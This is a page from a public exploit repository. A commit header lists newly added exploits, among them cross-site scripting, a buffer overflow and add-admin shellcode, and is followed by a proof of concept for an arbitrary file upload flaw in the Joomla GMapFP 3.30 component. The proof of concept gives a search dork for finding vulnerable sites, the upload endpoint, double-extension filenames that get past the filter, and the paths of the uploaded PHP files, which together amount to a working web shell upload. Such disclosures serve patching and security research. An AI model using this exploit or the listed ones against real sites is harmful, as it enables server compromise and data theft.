606ad946d3
7 changes to exploits/shellcodes AVAST SecureLine 5.5.522.0 - 'SecureLine' Unquoted Service Path 10-Strike Network Inventory Explorer - 'srvInventoryWebServer' Unquoted Service Path 10-Strike Network Inventory Explorer 8.54 - 'Add' Local Buffer Overflow (SEH) Wordpress Plugin WPForms 1.5.9 - Persistent Cross-Site Scripting Wordpress Plugin WPForms 1.5.8.2 - Persistent Cross-Site Scripting Joomla! Component GMapFP 3.30 - Arbitrary File Upload LeptonCMS 4.5.0 - Persistent Cross-Site Scripting Windows/x64 - WinExec Add-Admin Dynamic Null-Free Shellcode (210 Bytes)
24 lines
No EOL
760 B
Text
24 lines
No EOL
760 B
Text
# Exploit Title: Joomla! Component GMapFP 3.30 - Arbitrary File Upload
|
|
# Google Dork: inurl:''com_gmapfp''
|
|
# Date: 2020-03-25
|
|
# Exploit Author: ThelastVvV
|
|
# Vendor Homepage:https://gmapfp.org/
|
|
# Version:* Version J3.30pro
|
|
# Tested on: Ubuntu
|
|
|
|
# PoC:
|
|
|
|
http://127.0.0.1/index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image
|
|
|
|
# you can bypass the the restriction by uploading your file.php.png , file2.php.jpeg , file3.html.jpg ,file3.txt.jpg
|
|
|
|
# Dir File Path:
|
|
|
|
http://127.0.0.1/images/gmapfp/file.php
|
|
|
|
or
|
|
|
|
http://127.0.0.1//images/gmapfp/file.php.png
|
|
|
|
# The Joomla Gmapfp Components 3.x is allowing
|
|
# remote attackers to upload arbitrary files upload/shell upload due the issues of unrestricted file uploads |